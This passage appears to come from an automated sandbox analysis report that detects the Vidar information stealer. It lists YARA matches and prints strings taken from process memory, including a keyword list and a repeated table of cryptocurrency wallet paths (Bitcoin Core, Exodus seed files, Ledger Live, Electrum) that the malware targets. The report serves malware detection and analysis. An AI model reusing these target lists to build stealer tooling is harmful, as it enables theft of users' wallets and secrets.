                        Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 744, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6152, type: MEMORYSTR
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 3.2.BitLockerToGo.exe.2a00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138c6000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138bdec0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13880000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.BitLockerToGo.exe.2a3ecc0.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 744, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6152, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: eed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bitbucket.orglfons\AppData\Roaming\ElectronCash\wallets\*.**:&
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: eed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: eed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
